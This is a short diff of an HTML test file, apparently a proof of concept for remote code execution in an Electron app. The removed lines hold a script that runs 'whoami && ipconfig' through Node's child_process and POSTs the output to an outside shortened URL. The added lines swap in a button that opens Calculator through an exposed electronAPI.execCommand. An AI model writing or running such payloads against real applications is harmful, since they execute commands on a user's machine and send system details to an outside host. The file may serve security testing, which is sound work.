--- a/test_rc.html
+++ b/test_rc.html
@@ -1,18 +1,7 @@
 <!DOCTYPE html>
+<html>
 <body>
-  <script>
-    // Check if Node.js is available
-    if (typeof process !== 'undefined') {
-      const { exec } = require('child_process');
-      exec('whoami && ipconfig', (err, stdout) => {
-        fetch('https://tinyurl.com/3m6a35pm/rce', { 
-          method: 'POST', 
-          body: err ? err.message : stdout 
-        });
-      });
-    } else {
-      alert('Node.js integration disabled!');
-    }
-  </script>
+  <h1>RCE Trigger (macOS)</h1>
+  <button onclick="electronAPI.execCommand('open -a Calculator')">Open Calculator</button>
 </body>
 </html>
